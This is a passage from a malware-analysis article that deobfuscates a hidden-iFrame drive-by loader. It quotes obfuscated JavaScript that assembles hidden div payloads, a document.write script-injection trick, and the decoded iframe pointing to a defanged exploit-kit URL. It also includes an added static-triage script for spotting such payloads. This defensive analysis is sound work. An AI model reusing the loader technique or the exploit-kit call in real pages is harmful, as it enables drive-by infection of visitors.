In association with heise online

The hidden iFrame

To analyse the iFrame, I download the index.php file it points to with the wget command-line tool and open the file in an editor.

<div style='display: none;'>
<i id =i6C>qqfppBfqZfppSf[ ... ]3fSBfq</i>
<div id =pJ0rU7V>pf33[ ... ]BfEZf</div>
</div>

It is immediately clear that something strange is going on here: a block of HTML defines several elements with different IDs, yet all they contain is long character strings. What are they used for? We'll probably find out, but first let's look a bit further. The rest of the file consists of rather obscure JavaScript, containing commands such as:

function tG7A8Qj(qmueigi){...}

And then later:

var VunDhir=tG7A8Qj(yOaE3xU);


At first glance, it all looks like cryptic gobbledegook. Only an expert's eye can detect structures and processes.
It looks like the code has been passed through an obfuscator, replacing variable and function names with random character strings to make the code as unreadable as possible. It's quite clear that somebody is trying to hide something here. But they won't foil me so easily. Further down, I find a field which contains references to the two IDs mentioned above:

var fSxMadF = new Array("i6C","pJ0rU7V");

It appears that the long character strings will be needed later; they might even be commands in encoded form. Overall, the code defines four functions. The code that follows is directly executed by the browser when accessing the page:

var yOaE3xU="";
var o81fCJv = fSxMadF.length;
for (VunDhir=0; o81fCJv>VunDhir; VunDhir++) {
var yOaE3xU = yOaE3xU + w5JGZaJ(fSxMadF, VunDhir);
}

Although at first glance this may look like a mess, it is still reasonably understandable. Therefore, first I try a manual analysis: The yOaE3xU variable is initialised with the empty string, and the o81fCJv variable is given a value of 2, because the array contains the two ID tags from the code above. The for loop calls the w5JGZaJ() function twice:

function w5JGZaJ(fSxMadF, VunDhir) {
return VunDhir=document.getElementById(fSxMadF[VunDhir]).innerHTML;
}

Look at that – it reads the content of the HTML elements with the already familiar i6C and pJ0rU7V IDs via getElementById() and the innerHTML property. In the for loop, the content of each element is appended to the yOaE3xU variable. As a result, once the loop completes, this variable contains the long character strings from the HTML code.
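The two facts established so far, a hidden container full of payload strings and a script array naming the IDs the loop reads, can also be pulled out of the downloaded file statically, without evaluating any of its JavaScript. The following is an added example, not code from the article: the HTML it parses is constructed to mirror the shape of the snippet above (the payload text is made up), the regular expressions and function names are mine, and the depth-aware scan exists because a hidden div here contains another div, which a naive non-greedy match would cut short.

```javascript
// Added example (not from the original article): static triage of a downloaded
// index.php. Constructed HTML in the article's shape; payload strings are made up.
const SAMPLE_HTML = `
<div style='display: none;'>
<i id =i6C>qqfppBfqZfppSf3fSBfq</i>
<div id =pJ0rU7V>pf33BfEZf</div>
</div>
<script>
var fSxMadF = new Array("i6C","pJ0rU7V");
</script>`;

// Return the inner markup of every element whose inline style hides it.
// Same-name open/close tags are counted so nested containers are kept whole.
function hiddenBlockContents(html) {
  const blocks = [];
  const openRe = /<(\w+)([^>]*)>/g;
  let m;
  while ((m = openRe.exec(html)) !== null) {
    const [tag, name, attrs] = m;
    if (!/display\s*:\s*none/i.test(attrs)) continue;
    const tagRe = new RegExp(`<(\\/?)${name}\\b[^>]*>`, 'gi');
    tagRe.lastIndex = m.index + tag.length;
    let depth = 1;
    let t;
    while (depth > 0 && (t = tagRe.exec(html)) !== null) {
      depth += t[1] ? -1 : 1;
    }
    const end = t ? t.index : html.length;
    blocks.push(html.slice(m.index + tag.length, end));
  }
  return blocks;
}

// Child elements with an id attribute (quoted or not, spaces around '=' allowed).
const ID_ELEM_RE = /<(\w+)[^>]*\bid\s*=\s*['"]?([\w-]+)['"]?[^>]*>([\s\S]*?)<\/\1>/gi;

function extractHiddenPayloads(html) {
  const payloads = {};
  for (const block of hiddenBlockContents(html)) {
    for (const e of block.matchAll(ID_ELEM_RE)) payloads[e[2]] = e[3].trim();
  }
  return payloads;
}

// String literals inside new Array(...) calls: the IDs the loader will look up.
function referencedIds(html) {
  const ids = [];
  for (const m of html.matchAll(/new\s+Array\s*\(([^)]*)\)/g)) {
    for (const s of m[1].matchAll(/["']([^"']+)["']/g)) ids.push(s[1]);
  }
  return ids;
}

// Cross-check: every id the script names should resolve to a hidden payload.
function triage(html) {
  const payloads = extractHiddenPayloads(html);
  const referenced = referencedIds(html);
  return {
    payloads,
    referenced,
    unresolved: referenced.filter((id) => !(id in payloads)),
    totalLength: Object.values(payloads).reduce((n, s) => n + s.length, 0),
  };
}
```

An unresolved ID, or a payload far longer than the visible page would justify, is the kind of signal worth recording before any emulation is attempted.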

Let's carry on:

var VunDhir=tG7A8Qj(yOaE3xU);

Ok – this is probably where the scrambled characters are decoded. A glance at the decoding function, however, reveals even more gobbledegook:

function tG7A8Qj(qmueigi){
var Vvl57xe,dHnHlum,VUH4Mre,f9ft2GY="",
keMFvAW="B6SjRiQwmJfo1p9qbLl7cHI5EMFvWC8ZNtrzGVaXgxDekhnd0";
for(Vvl57xe=0;Vvl57xe<qmueigi.length;Vvl57xe++)
{dHnHlum=qmueigi.charAt(Vvl57xe);
....

And there is no end in sight, as a further decryptor() function is called towards the end. High time for another session with SpiderMonkey! The monkey initially trips over the getElementById() method and the innerHTML property, which only exist in the browser context. Luckily, I already know the result of the for loop from my manual analysis and can, therefore, assign a suitable value to the variable myself.

In a second attempt, SpiderMonkey gets a bit further, but then aborts again, issuing an error message which points to a missing reference to document in the following lines of code:

var gogle=document;
var yandex=document;
gogle.write("<scri"+"pt>");
yandex.write(VunDhir);
document.write("</sc"+"ript>");

This is a simple obfuscation method: The document object is assigned to several variables which are then used to re-execute the write() method in order to fire the code into the currently loaded page. For this purpose, the unpacked code is enclosed in scrambled script tags. To finally get to the injected code, I can replace the entire block with print(VunDhir);. SpiderMonkey produces the following result:

document.write("<iframe
src=\"hxxp://tissot333.cn/eleonore/pdf.php?spl=pdf_all\"
width=\"148\" height=\"261\" frameborder=\"0\"></iframe>");

Next: Sprayer at work

Permalink: http://h-online.com/-1019940